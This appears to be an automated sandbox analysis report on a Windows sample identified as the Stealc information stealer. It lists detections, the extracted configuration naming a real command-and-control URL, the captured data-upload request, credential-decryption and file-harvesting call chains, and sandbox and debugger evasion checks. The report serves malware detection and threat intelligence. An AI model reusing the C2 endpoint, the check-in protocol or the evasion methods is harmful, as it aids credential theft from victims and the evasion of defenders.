Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532539
MD5:015cafabe41e132a67c25584d105f0f0
SHA1:a4703fbfea7295fbb9bf105b5fee62d35de76c45
SHA256:254d42da1d65f92aef7b230e84b29b358a39a7fc9465097ab4223101a8a08edf
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2836 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 015CAFABE41E132A67C25584D105F0F0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2243095169.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2836JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2836JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.120000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-13T16:04:19.721286+020020442431Malware Command and Control Activity Detected192.168.2.649735185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.120000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.phpOVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpgVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpSVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 47%
                Source: file.exeVirustotal: Detection: 56%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0012C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00127240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00127240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00129AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00129B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00138EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00138EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00134910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0012DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0012E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0012ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00134570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0012DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0012BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0012F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00133EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00133EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001216D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49735 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 42 46 43 43 35 41 32 32 45 41 35 31 39 31 35 33 33 34 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="hwid"FBFCC5A22EA51915334237------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="build"doma------CAKKJKKECFIDGDHIJEGD--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00124880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00124880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 42 46 43 43 35 41 32 32 45 41 35 31 39 31 35 33 33 34 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="hwid"FBFCC5A22EA51915334237------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="build"doma------CAKKJKKECFIDGDHIJEGD--
                Source: file.exe, 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2284650077.0000000000F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2284650077.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpLMEM
                Source: file.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpO
                Source: file.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
                Source: file.exe, 00000000.00000002.2284650077.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
                Source: file.exe, 00000000.00000002.2284650077.0000000000F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpkn
                Source: file.exe, 00000000.00000002.2284650077.0000000000F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/rn
                Source: file.exe, 00000000.00000002.2284650077.0000000000F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2284650077.0000000000EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.372

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E50700_2_004E5070
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057F8320_2_0057F832
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E20DD0_2_004E20DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EB8A60_2_004EB8A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FA99C0_2_004FA99C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E822E0_2_004E822E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004ED3A90_2_004ED3A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F6C1F0_2_004F6C1F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F74130_2_004F7413
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006134B50_2_006134B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F3E410_2_004F3E41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E9E030_2_004E9E03
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DAE430_2_003DAE43
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F8E8D0_2_004F8E8D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EEF2D0_2_004EEF2D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E67970_2_004E6797
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 001245C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: mixhorwq ZLIB complexity 0.9949484559911242
                Source: file.exe, 00000000.00000003.2243095169.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00139600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00133720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00133720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ISSD814E.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 47%
                Source: file.exeVirustotal: Detection: 56%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1886720 > 1048576
                Source: file.exeStatic PE information: Raw size of mixhorwq is bigger than: 0x100000 < 0x1a6800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.120000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mixhorwq:EW;mafznnfz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mixhorwq:EW;mafznnfz:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00139860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cf67e should be: 0x1d94d3
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: mixhorwq
                Source: file.exeStatic PE information: section name: mafznnfz
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013B035 push ecx; ret 0_2_0013B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push ecx; mov dword ptr [esp], 35A5E242h0_2_004E50D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push eax; mov dword ptr [esp], 4596CAA1h0_2_004E5134
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push ecx; mov dword ptr [esp], ebx0_2_004E5141
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push 153D54DDh; mov dword ptr [esp], eax0_2_004E5175
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push edi; mov dword ptr [esp], 7E7FF580h0_2_004E517A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push 45F1B01Bh; mov dword ptr [esp], edi0_2_004E51C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push ebx; mov dword ptr [esp], 16694D25h0_2_004E51D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push ebp; mov dword ptr [esp], ecx0_2_004E526E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push eax; mov dword ptr [esp], ebx0_2_004E5272
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push edi; mov dword ptr [esp], 73C7B71Fh0_2_004E52FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push 526D3E7Ah; mov dword ptr [esp], ebp0_2_004E5342
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push 24AAFDD0h; mov dword ptr [esp], edx0_2_004E54D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push 4046D8FCh; mov dword ptr [esp], ebx0_2_004E554C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push edx; mov dword ptr [esp], 3B605BC0h0_2_004E55B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push 62483D6Eh; mov dword ptr [esp], ecx0_2_004E55FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push ebp; mov dword ptr [esp], ecx0_2_004E56A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push 11252BF5h; mov dword ptr [esp], ecx0_2_004E56E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push 6E253A0Bh; mov dword ptr [esp], ecx0_2_004E573C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push edx; mov dword ptr [esp], edi0_2_004E5795
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push edx; mov dword ptr [esp], 2C0B37EDh0_2_004E5799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push eax; mov dword ptr [esp], ecx0_2_004E57EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push 19C09341h; mov dword ptr [esp], edx0_2_004E580F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push ebx; mov dword ptr [esp], eax0_2_004E581C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push 379C046Ch; mov dword ptr [esp], eax0_2_004E5862
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push ebp; mov dword ptr [esp], 4FFF73EAh0_2_004E5866
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push edi; mov dword ptr [esp], eax0_2_004E5870
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push 44072BEEh; mov dword ptr [esp], ebx0_2_004E5892
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push ecx; mov dword ptr [esp], ebx0_2_004E5920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push 598F882Ch; mov dword ptr [esp], esi0_2_004E598D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E5070 push eax; mov dword ptr [esp], esi0_2_004E599E
                Source: file.exeStatic PE information: section name: mixhorwq entropy: 7.953784616003966

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00139860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13346
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFAFD second address: 4FFB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFB01 second address: 4FFB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFB09 second address: 4FFB0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFB0F second address: 4FFB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFB13 second address: 4FFB2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F2AF93CAABCh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFB2E second address: 4FFB35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
